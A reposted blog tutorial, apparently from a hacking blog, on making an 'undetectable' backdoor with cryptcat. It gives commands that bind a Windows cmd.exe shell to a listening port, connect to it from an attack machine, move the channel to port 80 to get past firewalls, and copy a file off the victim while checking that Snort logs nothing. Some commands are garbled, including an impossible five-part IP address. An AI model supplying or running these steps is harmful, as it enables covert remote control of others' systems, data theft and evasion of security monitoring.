Get Even More Visitors To Your Blog, Upgrade To A Business Listing >>
Idioma: En

Create a Backdoor Using CryptCat


Create An Undetectable Backdoor Using Cryptcat


Hey There Guys In This Tutorial I'm Going To Show You How To Create An Almost Undetectable BACKDOOR using Cryptcat

So Lets Get Cracking...

What Is Cryptcat ?

CryptCat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol while encrypting the data being transmitted. It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of Connection you would need and has several interesting built-in capabilities.Cryptcat enables us to communicate between two systems and encrypts the communication between them with twofish, one of many excellent encryption algorithms from Bruce Schneier et al.Twofish's encryption is on par with AES encryption, making it nearly bulletproof. In this way, the IDS can't detect the malicious behavior taking place even when its traveling across normal HTTP ports like 80 and 443.

Related Articles


This tutorial is for Educational purposes only and should not be used for any illegal activities . IM NOT RESPONSIBLE IF YOU CAUSE ANY DAMAGE OR MISUSE IT .Don’t INTRUDE into someone's privacy.

Step I  : Download Cryptcat

You can download and install cryptcat on a Windows system using this link.

Step II : Open a Listener on the Windows System


  • cryptcat -l -p 6996 -e cmd.exe

Step III : Open Snort

Now, Fire up IDS like Snort on another system that will connect to the Windows system to see whether the encryption is able to "blind" the IDS, leaving our backdoor invisible to such security devices.





Step IV : Connecting To The Windows System...

Since cryptcat is installed by default on BackTrack, we don't have to download and install it. In addition, it's in a /bin directory, so we can access it from any directory.


Now, we can connect to the Windows 7 system with cryptcat from our BackTrack system and see whether we can complete an encrypted backdoor connection that is nearly impossible to detect.
  • cryptcat 192.168.4.182.248 6996


As you can see, we connected to the Windows 7 system and received a command shell from the Win 7 system! This gives us significant control over that system, but not total control as it has limits !.


Step V: Checking your Snort Logs...

This type of attack (passing a command shell across the wire) is easily detected with Snort or other IDS's when the connection is unencrypted. Snort rules will alert the sys-admin that a cmd.exe shell has traversed their network connection, and they are likely to do something then to keep you using that command shell. With the encrypted connection available with cryptcat, this connection should be nearly undetectable.

Let's go back now and check your logs and alerts in Snort. If we were successful in evading the IDS, you should NOT see any alerts regarding command shell moving across the wire. We can check our logs by going to /var/snort/alerts and see whether any alerts have been triggered by our connection to the Windows machine.
  • kwrite /var/snort/alerts

Step VI: Sending Cryptcat to Bypass Firewall

Although we have successfully created an encrypted backdoor on the victim system, a vigilant security admin will notice that an unusual port (6996) is open. This will likely trigger some action by the security admin to limit our access. In addition, on systems with a good system admin and good firewall, this port will likely be blocked by the firewall.
For any network to be able to communicate on the Internet, they will likely need to keep open ports 80 and 443, certainly, but also possibly 25, 53, and 110. Since unencrypted, normal Internet traffic travels over port 80, it's nearly always open and a little more traffic will hardly be noticed.
Now that we have successfully used cryptcat, we'll send it over port 80 with all the other Internet traffic. Although it will be encrypted, it will look like any binary data crossing the wire. It will be nearly impossible for the security devices to detect or block it, as they must always allow traffic on port 80, and the traffic is encrypted, so the IDS can't "see" the contents.
Here we will move a file from the victim's system called test.txt to our attack system without any of the security devices detecting it. This time, instead of sending a command shell across the wire, we will be sending a test file named test.txt across our encrypted connection. We can do this by typing at the Windows command prompt:
  • cryptcat -l p 80

Step VII: Connecting To Listener.

Now, let's connect to the victim's system and pull across the test file. All we need to do is connect to the listener by typing cryptcat, the IP address of the victim system, and the port number of the listener.
  • cryptcat 192.168.182.248 80
Step VIII: Checking the Alert Files.

Let's once again check our Snort log files for any evidence that our IDS detected this movement of the top secret file.
  • kwrite /var/snort/alerts
HOPE YOU ENJOYED THE TUTORIAL




This post first appeared on Shahin Nishad, please read the originial post: here

Share the post

Create a Backdoor Using CryptCat

×

Subscribe to Shahin Nishad

Get updates delivered right to your inbox!

Thank you for your subscription

×